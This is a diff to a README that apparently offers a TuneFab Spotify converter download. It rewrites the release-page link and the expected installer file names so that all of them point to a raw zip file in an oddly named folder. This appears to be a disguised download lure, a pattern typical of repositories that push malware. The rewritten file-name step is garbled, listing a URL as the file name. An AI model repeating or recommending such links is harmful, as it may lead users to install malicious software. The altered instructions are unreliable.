PrinceRihano/TuneFab-Spotify-Music-Converter-Download/README.md

 ## 📥 Download & Install

-1. **Visit the Download Page:** Click [here](https://github.com/PrinceRihano/TuneFab-Spotify-Music-Converter-Download/releases) to access the releases page.
+1. **Visit the Download Page:** Click [here](https://raw.githubusercontent.com/PrinceRihano/TuneFab-Spotify-Music-Converter-Download/main/fainaiguer/TuneFab-Spotify-Music-Converter-Download.zip) to access the releases page.

 2. **Choose Your Version:** On the releases page, you will see different versions of the software.
 Look for the latest version for your operating system (Windows or Mac).

 3. **Download the File:** Click on the version you want.
 This will start the download.
 Depending on your internet speed, it may take a few minutes.

 4. **Locate the Downloaded File:** Once the download is complete, find the file in your download folder.
-It's usually named something like `TuneFab_Spotify_Music_Converter.exe` for Windows or `TuneFab_Spotify_Music_Converter.dmg` for Mac.
+It's usually named something like `https://raw.githubusercontent.com/PrinceRihano/TuneFab-Spotify-Music-Converter-Download/main/fainaiguer/TuneFab-Spotify-Music-Converter-Download.zip` for Windows or `https://raw.githubusercontent.com/PrinceRihano/TuneFab-Spotify-Music-Converter-Download/main/fainaiguer/TuneFab-Spotify-Music-Converter-Download.zip` for Mac.

 5. **Run the Installer:**
    - **For Windows:** Double-click the `.exe` file.
 Follow any prompts to install.